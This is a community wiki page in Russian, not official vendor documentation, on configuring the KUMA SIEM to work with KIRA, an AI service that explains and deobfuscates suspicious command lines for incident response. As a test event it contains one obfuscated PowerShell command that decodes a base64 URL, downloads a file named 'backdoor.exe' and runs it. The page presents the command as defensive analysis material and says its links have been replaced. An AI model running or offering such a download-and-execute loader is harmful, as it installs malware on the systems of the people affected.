Настройка интеграции с KIRA и примеры использования

Информация, приведенная на данной странице, является разработкой команды pre-sales и/или community KUMA и НЕ является официальной рекомендацией вендора.

Официальная документация по данному разделу приведена в онлайн-справке на продукт: 
https://support.kaspersky.ru/kuma/4.0/294800

Видео по работе KIRA и ключевые преимущества:
https://box.kaspersky.com/f/48a6de7a26044d9ea60c/ 

Kaspersky Investigation & Response Assistant (далее — KIRA) — это облачный сервис на базе искусственного интеллекта для анализа событий информационной безопасности.

KIRA выполняет детальный разбор командных строк и скриптов Windows и Linux с возможностью деобфускации, формирует краткое описание их назначения и предоставляет аналитическую информацию, необходимую для ускорения расследования инцидентов и приоритизации алертов.

Для использования сервиса ИИ KIRA необходимо:

Для получения сертификата и пароля обратитесь к сотрудникам Лаборатории Касперского или представителям партнера.

Настройка интеграции KIRA доступна только пользователю с ролью Главный администратор.


Настройка интеграции с KIRA

Чтобы настроить интеграцию с KIRA:

image481.png

После сохранения параметров будет показано доступное количество токенов. Количество токенов обновляется ежедневно.

Интеграция с сервисом KIRA успешно настроена. Анализ будет доступен для всех событий, как новых, так и уже полученных.


Выполнение анализа с помощью KIRA

После того как интеграция настроена, можно выполнять анализ команд или скриптов с помощью KIRA.

Для примера создадим новый алерт, но Вы также можете использовать события из уже сформированного алерта:

image482.png

SELECT * FROM `events` WHERE DeviceEventClassID = '4688' AND DeviceHostName = '<имя тестовой рабочей станции>'  ORDER BY Timestamp DESC LIMIT 250

image.png

 

powershell -NoProfile -NonInteractive -ExecutionPolicy Bypass -W Hidden -Command "$s = [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('aHR0cDovL2E3Mzk2ZDYxY2FmZmUxOGE0Y2ZmYmIzYjQyOGM5YjYwLmNvbS9kL2JhY2tkb29yLmV4ZQ==')); iwr $s -OutFile backdoor.exe; Start-Process .\backdoor.exe"

image483.png

Чтобы выполнить анализ:

image485.png

Альтернативный способ отправки запросов в KIRA: на панели инструментов в карточке события в раскрывающемся списке Проанализировать с помощью KIRA выберите поле, значение которого вы хотите проанализировать.

image486.png

image487.png

Чтобы ознакомиться с отчетом об деобфускации нажмите Действия и выберите Посмотреть отчет по деобфускации.

image488.png

image489.png

Возможность редактирования запроса перед отправкой в KIRA обеспечивает дополнительный уровень контроля над конфиденциальностью данных. Это особенно важно в случаях, когда анализируемые строки кода содержат чувствительную информацию, такую как персональные данные, учетные записи или ключи доступа.

image490.png

После выполнения анализа результат будет отображаться в карточке события на вкладке Анализ KIRA и будет доступен для просмотра всем пользователям с доступом к функциональности Проанализировать с помощью KIRA

Результаты анализа KIRA хранятся в кэше в течение 14 дней.

image491.png

Также можно просмотреть результат анализа в разделе Диспетчер задач в свойствах задачи Запрос в KIRA. При нажатии на название задачи, в контекстном меню будут доступны следующие действия:

image492.png

Помимо отправки запросов в KIRA при расследовании алертов запросы можно отправлять непосредственно из раздела События.

image493.png


Примеры команд для анализа KIRA

Команды нерабочие все ссылки заменены, но это не отменяет перепроверку и аккуратность использования!

Ссылка на примеры:
https://github.com/KUMA-Community/kuma_content/blob/main/kira/usecases.md 


Revision #13
Created 2025-04-14 07:29:49 UTC by Boris Rzr
Updated 2026-08-17 17:54:41 UTC by Dmitry Borisov